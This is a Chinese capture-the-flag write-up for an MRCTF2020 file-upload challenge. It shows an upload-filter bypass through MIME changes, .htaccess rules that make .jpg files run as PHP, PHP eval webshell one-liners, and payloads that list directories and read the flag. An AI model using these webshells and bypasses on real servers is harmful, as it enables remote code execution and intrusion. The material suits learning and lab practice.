原理
- .htaccess文件解析漏洞
- 以及MIME的修改,注意注意,三种MIME值png,jpg,gif不行的话都要试一遍,不要错过啦- -
- 手搓连接木马的系统命令多种使用方式
- payload:var_dump(scandir('/')); echo file_get_contents('/flag');
解题过程
进入靶场,让上传文件
上传文件抓包,发现包被过滤了,先试试改MIME值
发现MIME值改成png就能上传了
但是上传的只是gif文件,把文件后缀换成php,phtml等等都不行被过滤了。再试试上传.htaccess
同理修改MIME值才能过
.htaccess写法
方法一
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
// 1.jpg
<?php eval($_GET['a']);?>
方法二:
AddType application/x-httpd-php .jpg
// 1.jpg
<?php eval($_GET['a']);?>
php木马写法
<script language='php'>@eval($_POST['aaa']);</script>
<?php @eval($_POST['aaa']);?>
那就用工具连接或者手动连接了
手动连接的时候参数echo system('ls /')或者var_dump(system('ls /'))都不行
只有var_dump(scandir('/'))才可以读出目录
最后读取文件内容
var_dump(file_get_contents('/flag'));
参考文章:https://blog.csdn.net/weixin_44632787/article/details/118049911
标签:dump,jpg,MIME,var,php,上传,MRCTF2020 From: https://www.cnblogs.com/BEONTHE/p/17751711.html